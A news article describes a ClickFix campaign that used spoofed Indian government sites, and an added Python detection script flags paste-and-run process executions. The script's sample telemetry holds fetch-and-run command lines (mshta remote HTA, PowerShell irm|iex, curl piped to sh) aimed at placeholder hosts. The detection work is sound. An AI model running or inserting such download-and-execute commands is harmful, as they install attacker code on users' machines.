ClickFix malware used in cross-platform Indian spoof attack

May 11, 2025

ClickFix, the social-engineering technique in which a web page tricks the visitor into pasting and running a command the page has silently placed on the clipboard, has once again emerged as a tool of choice for cybercriminals. A recent campaign spoofed Indian government websites to deliver malicious payloads to Windows, Linux, and Android visitors. Cybersecurity researchers have linked the activity to the Pakistan-aligned group APT36, also known as Transparent Tribe, which has a long history of targeting Indian defence and public sector organisations.

The campaign began with fake websites that closely resembled legitimate Indian government portals, including those of the Ministry of Defence and India Post. The attackers cloned press release archives and other official-looking pages, then placed ClickFix lures on them to steer visitors into downloading or executing malicious files themselves.

ClickFix malware was used in spoofed Indian government sites to deliver OS-specific payloads through deceptive interfaces, clipboard commands, and disguised downloads.

One such example was a domain imitating the Ministry of Defence, where a spoofed press release portal displayed links for monthly updates. While most links showed “No Data,” the only active one, labelled March 2025, started an infection chain that fingerprinted the visitor’s operating system and served a payload tailored to it.

For Linux users, the page posed as a CAPTCHA check, with a misspelt “I’m not a rebot” button. Clicking it silently copied a shell command to the user’s clipboard; the page then relied on the victim pasting that command into a terminal. When executed, the command downloaded and ran a shell script from a compromised domain. The script itself appeared non-malicious at the time of analysis, a common pattern when a staging server is serving a placeholder or returning the real payload only to selected visitors, so the chain should still be treated as hostile.

Windows users, however, were greeted with a fake “For Official Use Only” warning page mimicking a government disclosure notice. Behind the scenes, a command invoking `mshta.exe` was copied to the clipboard. `mshta.exe` is a signed Windows binary that runs HTML Applications, including ones fetched from a remote URL, which makes it a convenient living-off-the-land launcher: here it executed a heavily obfuscated HTA payload that connected to a known malicious IP address and launched a .NET-based malware loader. A cloned Ministry of Defence press release was then displayed to maintain the illusion of legitimacy.

The same tactics were also observed on another spoofed site, postindia[.]site, which delivered different payloads based on device type. Windows visitors received a PDF that carried PowerShell commands, while Android users were prompted to install an app disguised as a legitimate India Post service. The app harvested sensitive data and used deceptive icons to hide its presence on the device.
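The three Windows and Linux chains described above (a shell command pasted after the fake CAPTCHA, an `mshta.exe` command pasted after the fake warning page, and PowerShell launched from a PDF) share one telemetry signature: a living-off-the-land binary or shell, often launched from the Run dialog or a terminal, with a remote URL on its command line. The following Python is an added example written for this page, not code from the article or from any researcher cited by it. The event shape mirrors Sysmon Event ID 1 / auditd process-creation records, and the host names, `.example` domains, TEST-NET addresses and rule patterns are all constructed for illustration; none of them are indicators from the campaign.

```python
"""
Flag ClickFix-style "paste and run" executions in process-creation telemetry.

Added example, not code from the article or from any vendor report. Rule
patterns are generic ClickFix tradecraft (a LOLBin or shell launched from an
interactive parent with a remote URL on its command line), not campaign IOCs.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str


def basename(path: str) -> str:
    """Last component of a Windows or POSIX path, lower-cased."""
    return path.rsplit("\\", 1)[-1].rsplit("/", 1)[-1].lower()


# Parents a user-pasted command is typically launched from: the Windows Run
# dialog (explorer.exe), a Windows command shell, or a Linux terminal shell.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe",
                       "bash", "sh", "zsh", "dash"}

URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)

# (rule name, regex on the image basename, regex on the command line)
RULES = [
    # mshta.exe fetching and running a remote HTML Application
    ("mshta_remote_hta", r"^mshta\.exe$", r"https?://"),
    # PowerShell download cradle or encoded command
    ("powershell_download_cradle", r"^(powershell|pwsh)(\.exe)?$",
     r"(\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|iex)\b"
     r"|\s-enc\w*)"),
    # curl/wget output piped straight into a shell
    ("curl_pipe_shell", r"^(bash|sh|zsh|dash)$",
     r"\b(curl|wget)\b[^|]*\|\s*(ba|z|da)?sh\b"),
]


def classify(ev: ProcEvent) -> list[str]:
    """Return the rule names an event triggers, plus an 'interactive_parent'
    tag when the child was launched from a user-facing shell or the Run
    dialog: the signature of a pasted command rather than an exploit."""
    image = basename(ev.image)
    hits = [name for name, img_re, cmd_re in RULES
            if re.search(img_re, image, re.I)
            and re.search(cmd_re, ev.command_line, re.I)]
    if hits and basename(ev.parent_image) in INTERACTIVE_PARENTS:
        hits.append("interactive_parent")
    return hits


def extract_urls(command_line: str) -> list[str]:
    """Pull remote URLs off the command line for IOC pivoting (domain/IP)."""
    return URL_RE.findall(command_line)


def triage(events: list[ProcEvent]) -> list[dict]:
    """Reduce a batch of events to the ones worth an analyst's attention."""
    findings = []
    for ev in events:
        hits = classify(ev)
        if hits:
            findings.append({"host": ev.host, "image": basename(ev.image),
                             "rules": hits, "urls": extract_urls(ev.command_line)})
    return findings


# Constructed sample telemetry (TEST-NET addresses, .example domains).
SAMPLE_EVENTS = [
    # Windows: command pasted into Win+R after a fake warning page
    ProcEvent("WKS-01", r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://203.0.113.10/press.hta"),
    # Windows: PowerShell spawned by a PDF reader
    ProcEvent("WKS-02", r"C:\Program Files\Reader\Reader.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -c "irm http://postindia.example/p.ps1 | iex"'),
    # Linux: command pasted into a terminal after a fake CAPTCHA
    ProcEvent("lnx-03", "/bin/bash", "/bin/bash",
              'bash -c "curl -fsSL http://198.51.100.7/x.sh | sh"'),
    # Benign noise: a service host, and a legitimate local HTA
    ProcEvent("WKS-01", r"C:\Windows\System32\services.exe",
              r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    ProcEvent("WKS-04", r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\Program Files\Vendor\ui.hta"'),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The rules deliberately require a remote URL or a download cradle, so a locally installed HTA or an administrator's plain `powershell -File` run does not fire; the `interactive_parent` tag is the part that separates a user pasting into the Run dialog or a terminal from scripted automation, and is the first thing to check when triaging a hit.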

Experts highlight that ClickFix is especially dangerous because it combines clipboard manipulation with social engineering: the victim, not an exploit, performs the final execution step, so controls that only watch for malicious downloads or drive-by exploitation see nothing, and even cautious users can be talked into self-infecting their systems. With repeated use of government branding, cloned sites, and cross-platform targeting, the campaign illustrates the evolving threats facing public-sector cybersecurity.

Security professionals recommend heightened vigilance for clipboard-based scripts, including commands launched from the Run dialog or a terminal shortly after a browser visit, as well as for spoofed domains and deceptive site elements such as fake CAPTCHA and warning pages, warning that ClickFix tactics are likely to resurface in future attacks.
